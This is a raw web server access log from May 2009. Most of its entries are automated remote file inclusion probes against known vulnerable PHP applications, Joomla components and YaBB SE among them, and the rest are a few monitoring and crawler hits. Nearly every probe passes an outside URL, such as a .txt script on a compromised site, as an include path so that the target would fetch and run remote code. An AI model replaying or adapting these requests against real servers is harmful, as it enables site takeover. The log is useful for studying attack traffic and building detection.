221.139.104.104 - - [19/May/2009:01:23:26 -0400] "GET /logs/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
81.175.71.121 - - [19/May/2009:01:24:17 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:24:17 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:24:17 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:24:18 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.59.148.76 - - [19/May/2009:01:24:38 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:24:38 -0400] "GET /logs/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:24:38 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
209.59.12.99 - - [19/May/2009:01:24:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [19/May/2009:01:26:31 -0400] "GET /logs/error_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:26:45 -0400] "GET /logs/error_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
67.19.228.18 - - [19/May/2009:01:26:56 -0400] "GET /logs/access_log.Q109022600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:26:56 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:26:56 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:27:05 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:27:05 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:27:05 -0400] "GET /logs/access_log.Q109022600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:27:48 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
84.54.137.9 - - [19/May/2009:01:27:51 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:27:51 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:27:51 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
67.19.228.18 - - [19/May/2009:01:27:59 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
122.153.212.195 - - [19/May/2009:01:28:28 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:01:28:28 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:01:28:28 -0400] "GET /logs/access_log.Q108091400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:01:30:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.59.148.76 - - [19/May/2009:01:35:03 -0400] "GET /logs/access_log.Q108100900/skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:35:03 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:35:03 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:35:06 -0400] "GET /logs/access_log.Q108100900/skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:35:06 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:01:35:07 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
209.59.12.99 - - [19/May/2009:01:35:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [19/May/2009:01:35:53 -0400] "GET //popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:35:53 -0400] "GET /logs/access_log.Q108052400%20%20//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:35:53 -0400] "GET /logs//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:36:00 -0400] "GET //popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:36:00 -0400] "GET /logs//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:36:00 -0400] "GET /logs/access_log.Q108052400%20%20//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:13 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:18 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:19 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:20 -0400] "GET /logs/access_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:23 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:28 -0400] "GET /logs/access_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:32 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:32 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:32 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:35 -0400] "GET /logs/access_log.Q108072100%20%20/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:36 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:36:43 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:01:37:15 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:01:37:16 -0400] "GET /phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:01:37:16 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:01:37:28 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:10 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:10 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:10 -0400] "GET /logs/error_log.Q109012600//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:16 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:16 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:38:16 -0400] "GET /logs/error_log.Q109012600%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:38:55 -0400] "GET //popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:38:55 -0400] "GET /logs//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:38:59 -0400] "GET /logs/access_log.Q108052400//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:39:11 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:39:11 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:39:11 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:01:39:27 -0400] "GET /logs/access_log.Q108082900/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:39:40 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.111.189.11 - - [19/May/2009:01:40:29 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:01:40:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.189.11 - - [19/May/2009:01:40:43 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:40:59 -0400] "GET //popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:40:59 -0400] "GET /logs//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:40:59 -0400] "GET /logs/access_log.Q108052400//popup_window.php?site_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:41:10 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:41:10 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:41:10 -0400] "GET /logs/access_log.Q109050900//yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:01:41:48 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
124.217.216.86 - - [19/May/2009:01:41:48 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 1959 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.128.135.52 - - [19/May/2009:01:42:36 -0400] "GET /logs/access_log.Q108082900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:42:40 -0400] "GET /logs/access_log.Q108082900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
208.64.202.134 - - [19/May/2009:01:42:40 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:01:42:40 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:01:42:41 -0400] "GET /logs/access_log.Q109050900//yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:01:42:41 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:01:42:41 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:01:42:41 -0400] "GET /logs/access_log.Q109050900//yabbse/Sources/Packages.php?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:01:43:03 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:43:14 -0400] "GET /main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:43:14 -0400] "GET /logs/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:43:19 -0400] "GET /main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:43:19 -0400] "GET /logs/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:01:43:19 -0400] "GET /logs/access_log.Q109050700/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:01:43:35 -0400] "GET /logs/access_log.Q108070100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.79.35 - - [19/May/2009:01:44:13 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:44:13 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:44:13 -0400] "GET /logs/access_log.Q109050900//yabbse/Sources/Packages.php?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:01:44:27 -0400] "GET /logs/access_log.Q109050700/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:44:31 -0400] "GET /main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:44:31 -0400] "GET /logs/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:44:31 -0400] "GET /logs/access_log.Q109050700/main.php?page=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.19.228.18 - - [19/May/2009:01:44:57 -0400] "GET /logs/error_log.Q109031900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:57 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:57 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:57 -0400] "GET /logs/access_log.Q109021200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:58 -0400] "GET /logs/error_log.Q109031900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:58 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:58 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:44:58 -0400] "GET /logs/access_log.Q109021200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
209.59.12.99 - - [19/May/2009:01:45:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.143.109.236 - - [19/May/2009:01:48:32 -0400] "GET /errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:01:48:34 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:01:48:34 -0400] "GET /logs/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:01:48:52 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.228.18 - - [19/May/2009:01:49:20 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:20 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:20 -0400] "GET /logs/access_log.Q109032900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:21 -0400] "GET /logs/access_log.Q109032900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:21 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:21 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
91.121.210.42 - - [19/May/2009:01:49:39 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:01:49:39 -0400] "GET /logs/access_log.Q109030800//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:01:49:39 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:01:49:45 -0400] "GET /logs/access_log.Q108121200//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.19.228.18 - - [19/May/2009:01:49:49 -0400] "GET /logs/error_log.Q109021200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
67.19.228.18 - - [19/May/2009:01:49:51 -0400] "GET /logs/error_log.Q109021200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
94.23.197.172 - - [19/May/2009:01:50:09 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
94.23.197.172 - - [19/May/2009:01:50:09 -0400] "GET /logs/access_log.Q109030800//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
94.23.197.172 - - [19/May/2009:01:50:09 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
209.59.12.99 - - [19/May/2009:01:50:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.197.172 - - [19/May/2009:01:50:36 -0400] "GET /logs/access_log.Q108121200//tools/send_reminders.php?noSet=0&includedir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
